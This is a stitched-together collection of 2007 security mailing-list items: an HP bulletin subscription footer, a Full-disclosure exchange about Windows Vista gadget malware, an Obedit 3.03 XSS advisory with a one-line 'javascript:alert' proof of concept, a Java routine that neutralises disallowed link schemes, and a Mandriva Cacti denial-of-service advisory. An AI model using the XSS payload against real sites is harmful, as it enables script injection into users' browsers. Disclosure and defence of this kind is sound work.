Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category th
RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API
"Roger A. Grimes" <[EMAIL PROTECTED]> writes:

>I'm sorry, we'll have to agree to disagree. I don't see the new attack vector
>here. I, the attacker, have to make you download my malicious trojan program,
>which you install on your computer.

It's not so much the attack vector, it's the usability issue. This makes it just too easy to convince users to download and execute untrusted content.

>But if you're worried that your users will click past 3 to 5 warning messages
>to install untrusted gadgets (which they will), then completely control them
>using group policy.

On Joe Sixpack's PC in his den?

(As you say, I think we'll have to agree to disagree on this one. Let's wait until the phishers discover it and then revisit the topic :-).

Peter
XSS on Obedit v3.03
=== Obedit v3.03 - XSS Vuln. ===

Author: Ishkur
Impact: XSS and Cookie Alert
Patches: in development

--- Affected Software Description: ---

Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit

Description: Obedit is a Flash-based rich text editor. It allows a user to edit text much as in an office application, with simple editing features such as bold, italic, justification, block indents, text color, font and size selection, links, bullets, background color, and spell checking.

Vulns: open to XSS and cookie alerts via the 'save' function.

PoC Exploit: save a document containing the code:

javascript:alert("XSS");

--- Solution: ---

none as of yet
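An added example, not Obedit's code, for the server side that stores what the editor posts back on save: assuming the payload reaches the server as a link target inside the saved markup, this rewrites any href whose scheme is not on a short allow list, including whitespace-obfuscated javascript: variants. Class, method names and the simplified attribute pattern are assumptions.

```java
import java.util.List;
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public final class LinkTargetPolicy {

    private static final List<String> ALLOWED_SCHEMES = List.of("http", "https", "mailto");

    // href="..." or href='...' in the saved markup (simplified attribute grammar, assumed)
    private static final Pattern HREF =
            Pattern.compile("href\\s*=\\s*([\"'])(.*?)\\1", Pattern.CASE_INSENSITIVE);

    /** True when the target is a relative URL or uses an allowed scheme. */
    static boolean isSafeTarget(String raw) {
        // Browsers drop leading/trailing whitespace and embedded control characters
        // before detecting the scheme, so "java\tscript:alert(1)" still executes;
        // normalise the same way before looking at the scheme.
        StringBuilder sb = new StringBuilder(raw.length());
        for (char c : raw.trim().toCharArray()) {
            if (c > 0x20 && c != 0x7f) sb.append(c);
        }
        String url = sb.toString();
        int colon = url.indexOf(':');
        if (colon < 0) return true;                              // no scheme: relative URL
        String scheme = url.substring(0, colon).toLowerCase(Locale.ROOT);
        if (!scheme.matches("[a-z][a-z0-9+.-]*")) return true;   // e.g. "docs/a:b" is a path
        return ALLOWED_SCHEMES.contains(scheme);
    }

    /** Rewrites every disallowed href to "#" and leaves the rest of the markup untouched. */
    static String neutraliseLinks(String savedDocument) {
        Matcher m = HREF.matcher(savedDocument);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String quote = m.group(1);
            String replacement = isSafeTarget(m.group(2))
                    ? m.group(0)
                    : "href=" + quote + "#" + quote;
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }
}
```

Run the check on entity-decoded attribute values; for real markup an HTML parser, not this regex, is the right tool.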
[ MDKSA-2007:184 ] - Updated cacti packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
Mandriva Linux Security Advisory                               MDKSA-2007:184
http://www.mandriva.com/security/
___

Package : cacti
Date: September 17, 2007
Affected: Corporate 4.0
___

Problem Description:

A vulnerability in Cacti 0.8.6i and earlier versions allows remote authenticated users to cause a denial of service (CPU consumption) via large values of the graph_start, graph_end, graph_height, or graph_width parameters.

Updated packages have been patched to prevent this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3112
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3113
___

Updated Packages:

Corporate 4.0:
0c6f53c1812f0a5e8e5ae5206812dee4  corporate/4.0/i586/cacti-0.8.6f-3.2.20060mlcs4.noarch.rpm
a2a965f19a5e7071c30963026f4841bc  corporate/4.0/SRPMS/cacti-0.8.6f-3.2.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
546c9a6b1e489ae63994efe8060f6e7a  corporate/4.0/x86_64/cacti-0.8.6f-3.2.20060mlcs4.noarch.rpm
a2a965f19a5e7071c30963026f4841bc  corporate/4.0/SRPMS/cacti-0.8.6f-3.2.20060mlcs4.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFG7tK/mqjQ0CJFipgRAn3AAKCVaPuTwsehGrGgP1ZOidjj7x8DlwCfWesJ
jwCO+qnEsfe435TT+HCFLTw=
=Ek9h
-END PGP SIGNATURE-